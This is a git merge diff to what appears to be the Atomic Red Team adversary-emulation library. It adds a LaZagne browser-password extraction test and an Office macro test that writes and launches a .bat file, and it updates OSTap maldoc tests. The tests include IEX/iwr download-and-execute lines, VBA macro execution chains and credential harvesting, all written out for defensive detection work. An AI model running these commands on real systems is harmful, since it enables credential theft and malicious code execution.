Merge branch 'master' into bugfix/7e46c7a5-0142-45be-a858-1a3ecb4fd3cb

atomics/Indexes/Indexes-CSV/index.csv

@@ -184,6 +184,7 @@ credential-access,T1552.001,Credentials In Files,3,Extracting passwords with fin
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
+credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
@@ -631,6 +632,7 @@ execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4
 execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
 execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
 execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
+execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -438,6 +438,7 @@ execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4
 execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
 execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
 execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
+execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -477,6 +478,7 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
+credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -383,6 +383,7 @@
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
   - Atomic Test #2: Search macOS Safari Cookies [macos]
+  - Atomic Test #3: LaZagne - Credentials from Browser [windows]
 - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
   - Atomic Test #1: Enumeration for Credentials in Registry [windows]
   - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
@@ -1088,6 +1089,7 @@
   - Atomic Test #2: OSTap Payload Download [windows]
   - Atomic Test #3: Maldoc choice flags command execution [windows]
   - Atomic Test #4: OSTAP JS version [windows]
+  - Atomic Test #5: Office launching .bat file from AppData [windows]
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1106 Native API](../../T1106/T1106.md)
   - Atomic Test #1: Execution through API - CreateProcess [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -835,6 +835,7 @@
   - Atomic Test #2: OSTap Payload Download [windows]
   - Atomic Test #3: Maldoc choice flags command execution [windows]
   - Atomic Test #4: OSTAP JS version [windows]
+  - Atomic Test #5: Office launching .bat file from AppData [windows]
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1106 Native API](../../T1106/T1106.md)
   - Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -915,6 +916,7 @@
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
+  - Atomic Test #3: LaZagne - Credentials from Browser [windows]
 - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
   - Atomic Test #1: Enumeration for Credentials in Registry [windows]
   - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]

atomics/Indexes/index.yaml

@@ -17834,6 +17834,34 @@ credential-access:
           cd ~/Library/Cookies
           grep -q "#{search_string}" "Cookies.binarycookies"
         name: sh
+    - name: LaZagne - Credentials from Browser
+      auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014
+      description: "The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne)
+        to extract passwords from browsers on the Windows operating system.\nLaZagne
+        is an open source application used to retrieve passwords stored on a local
+        computer. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        lazagne_path:
+          description: Path to LaZagne
+          type: Path
+          default: PathToAtomicsFolder\T1555.003\bin\LaZagne.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+
+'
+        prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "#{lazagne_path} browsers\n"
   T1552.002:
     technique:
       external_references:
@@ -42718,7 +42746,7 @@ discovery:
           quser
           qwinsta.exe /server:#{computer_name}
           qwinsta.exe
-          for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+          for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
           @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
         name: command_prompt
     - name: System Owner/User Discovery
@@ -44278,8 +44306,7 @@ execution:
       description: |
         This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
         Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
-        This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+        This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
         References:
           https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
       supported_platforms:
@@ -44296,30 +44323,34 @@ execution:
           type: String
           default: Word
         ms_office_version:
-          description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+          description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+            Default latest version.
           type: String
-          default: '16.0'
+          default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+            -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+            | Sort-Object -desc)[0]
       dependency_executor_name: powershell
       dependencies:
       - description: 'Test Requires MS Office to be installed and have been run previously.
           Run -GetPrereqs to run msword and build dependant registry keys
 
 '
-        prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
-          { exit 0 } else { exit 1 }
-
-'
+        prereq_command: |
+          $ms_office_version = #{ms_office_version}
+          If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
         get_prereq_command: |
           $msword = New-Object -ComObject word.application
           Stop-Process -Name WINWORD
       executor:
         command: |
           IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+          $ms_office_version = #{ms_office_version}
           $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
-          Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+          Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
         cleanup_command: |
           if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-          Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+          $ms_office_version = #{ms_office_version}
+          Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
         name: powershell
     - name: OSTap Payload Download
       auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
@@ -44358,37 +44389,38 @@ execution:
           type: String
           default: Word
         ms_office_version:
-          description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+          description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+            Default latest version.
           type: String
-          default: '16.0'
+          default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+            -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+            | Sort-Object -desc)[0]
       dependency_executor_name: powershell
       dependencies:
       - description: 'Test Requires MS Office to be installed and have been run previously.
           Run -GetPrereqs to run msword and build dependant registry keys
 
 '
-        prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
-          { exit 0 } else { exit 1 }
-
-'
+        prereq_command: |
+          $ms_office_version = #{ms_office_version}
+          If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
         get_prereq_command: |
           $msword = New-Object -ComObject word.application
           Stop-Process -Name WINWORD
       executor:
         command: |
           IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+          $ms_office_version = #{ms_office_version}
           $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
-          Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
-        cleanup_command: 'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
-          -Name ''AccessVBOM'' -ErrorAction Ignore
-
-'
+          Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+        cleanup_command: |
+          $ms_office_version = #{ms_office_version}
+          Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
         name: powershell
     - name: OSTAP JS version
       auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
       description: |
         Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
-
         Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
       supported_platforms:
       - windows
@@ -44402,30 +44434,80 @@ execution:
           type: String
           default: Word
         ms_office_version:
-          description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+          description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+            Default latest version.
           type: String
-          default: '16.0'
+          default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+            -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+            | Sort-Object -desc)
       dependency_executor_name: powershell
       dependencies:
       - description: 'Test Requires MS Office to be installed and have been run previously.
           Run -GetPrereqs to run msword and build dependant registry keys
 
 '
-        prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
-          { exit 0 } else { exit 1 }
-
-'
+        prereq_command: |
+          $ms_office_version = #{ms_office_version}
+          If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
         get_prereq_command: |
           $msword = New-Object -ComObject word.application
           Stop-Process -Name WINWORD
       executor:
         command: |
           IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+          $ms_office_version = #{ms_office_version}
           $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
-          Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+          Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
         cleanup_command: |
+          $ms_office_version = #{ms_office_version}
           if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-          Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+          Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+        name: powershell
+    - name: Office launching .bat file from AppData
+      auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
+      description: Microsoft Office creating then launching a .bat script from an
+        AppData directory. The .bat file launches calc.exe when opened.
+      supported_platforms:
+      - windows
+      input_arguments:
+        bat_path:
+          description: Path to malicious .bat file
+          type: String
+          default: $env:temp+"\art1204.bat"
+        ms_office_version:
+          description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+            Default latest version.
+          type: string
+          default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+            -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+            | Sort-Object -desc)[0]
+        ms_product:
+          description: Maldoc application Word or Excel
+          type: String
+          default: Word
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Test Requires MS Office to be installed and have been run previously.
+          Run -GetPrereqs to run msword and build dependant registry keys
+
+'
+        prereq_command: |
+          $ms_office_version = #{ms_office_version}
+          If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          $msword = New-Object -ComObject word.application
+          Stop-Process -Name WINWORD
+      executor:
+        command: |
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+          $ms_office_version = #{ms_office_version}
+          $bat_path = #{bat_path}
+          $macrocode = "   Open `"$bat_path`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+          Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+        cleanup_command: |
+          $ms_office_version = #{ms_office_version}
+          if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
+          Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
         name: powershell
   T1204.001:
     technique:

atomics/T1033/T1033.md

@@ -42,7 +42,7 @@ quser /SERVER:"#{computer_name}"
 quser
 qwinsta.exe /server:#{computer_name}
 qwinsta.exe
-for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
 @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
 ```
 

atomics/T1204.002/T1204.002.md

@@ -16,14 +16,15 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
 
 - [Atomic Test #4 - OSTAP JS version](#atomic-test-4---ostap-js-version)
 
+- [Atomic Test #5 - Office launching .bat file from AppData](#atomic-test-5---office-launching-bat-file-from-appdata)
+
 
 <br/>
 
 ## Atomic Test #1 - OSTap Style Macro Execution
 This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
 Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
-This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
 References:
   https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
 
@@ -37,7 +38,7 @@ References:
 |------|-------------|------|---------------|
 | jse_path | Path for the macro to write out the "malicious" .jse file | String | C:&#92;Users&#92;Public&#92;art.jse|
 | ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
 
 
 #### Attack Commands: Run with `powershell`! 
@@ -45,14 +46,16 @@ References:
 
 ```powershell
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
 ```
 
 #### Cleanup Commands:
 ```powershell
 if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+$ms_office_version = #{ms_office_version}
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
 ```
 
 
@@ -61,7 +64,8 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
 ##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
 ##### Check Prereq Commands:
 ```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } 
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -123,7 +127,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
 
 
 #### Attack Commands: Run with `powershell`! 
@@ -131,13 +135,15 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 
 ```powershell
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
 $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
 ```
 
 #### Cleanup Commands:
 ```powershell
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+$ms_office_version = #{ms_office_version}
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
 ```
 
 
@@ -146,7 +152,8 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
 ##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
 ##### Check Prereq Commands:
 ```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } 
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -162,7 +169,6 @@ Stop-Process -Name WINWORD
 
 ## Atomic Test #4 - OSTAP JS version
 Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
-
 Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
 
 **Supported Platforms:** Windows
@@ -175,7 +181,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 |------|-------------|------|---------------|
 | jse_path | jse file to execute with wscript | Path | C:&#92;Users&#92;Public&#92;art.jse|
 | ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)|
 
 
 #### Attack Commands: Run with `powershell`! 
@@ -183,14 +189,16 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 
 ```powershell
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
 ```
 
 #### Cleanup Commands:
 ```powershell
+$ms_office_version = #{ms_office_version}
 if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
 ```
 
 
@@ -199,7 +207,63 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
 ##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
 ##### Check Prereq Commands:
 ```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } 
+```
+##### Get Prereq Commands:
+```powershell
+$msword = New-Object -ComObject word.application
+Stop-Process -Name WINWORD
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Office launching .bat file from AppData
+Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| bat_path | Path to malicious .bat file | String | $env:temp+"&#92;art1204.bat"|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | string | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
+| ms_product | Maldoc application Word or Excel | String | Word|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
+$bat_path = #{bat_path}
+$macrocode = "   Open `"$bat_path`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+```
+
+#### Cleanup Commands:
+```powershell
+$ms_office_version = #{ms_office_version}
+if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Check Prereq Commands:
+```powershell
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } 
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1204.002/T1204.002.yaml

@@ -1,12 +1,12 @@
 attack_technique: T1204.002
-display_name: 'User Execution: Malicious Link'
+display_name: 'User Execution: Malicious File'
 atomic_tests:
 - name: OSTap Style Macro Execution
   auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff
   description: |
     This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
     Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-    This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+    This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
     References:
       https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
   supported_platforms:
@@ -145,8 +145,9 @@ atomic_tests:
       if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
       Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
     name: powershell
-
+    
 - name: Office launching .bat file from AppData
